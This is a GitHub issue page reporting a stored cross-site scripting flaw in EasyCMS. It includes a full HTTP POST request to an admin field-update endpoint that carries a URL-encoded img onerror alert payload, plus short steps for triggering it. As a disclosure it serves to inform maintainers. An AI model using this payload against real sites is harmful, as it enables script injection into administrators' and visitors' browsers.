Skip to content
This repository has been archived by the owner on Dec 26, 2019. It is now read-only.

There is a XSS with EasyCMS #6

Closed
Hu3sky opened this issue Aug 24, 2018 · 0 comments
Closed

There is a XSS with EasyCMS #6

Hu3sky opened this issue Aug 24, 2018 · 0 comments

Comments

@Hu3sky
Copy link

Hu3sky commented Aug 24, 2018

the POST file is

POST /cms/EasyCMS-master/index.php?s=/admin/fields/update/navTabId/listfields/callbackType/closeCurrent HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/cms/EasyCMS-master/index.php?s=/admin/index/index.html
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 85
Cookie: xwbR=e; security_level=0; lang=01f3de6ab556650fc41b06c36953a965bfed73e6%7Een; deviceid=1531019766994; xinhu_mo_adminid=1; xinhu_ca_adminuser=admin; xinhu_ca_rempass=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1533191574,1533518444,1533888717; PHPSESSID=c5638ad66889b1cc2301d8f55a32f13a; _utcpl=3fa38e8e609cc8283e8467749e14db2fs1; think_template=default
X-Forwarded-For: 127.0.0.1
Connection: close

fields_id=5&content=%3Cimg+src%3D%221%22+onerror%3D%22alert(1)%22+alt%3D%22%22+%2F%3E

tim 20180824170916
when we fill the payload in it,close it,Then click the submit again,the xss will trigger
tim 20180824170940

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants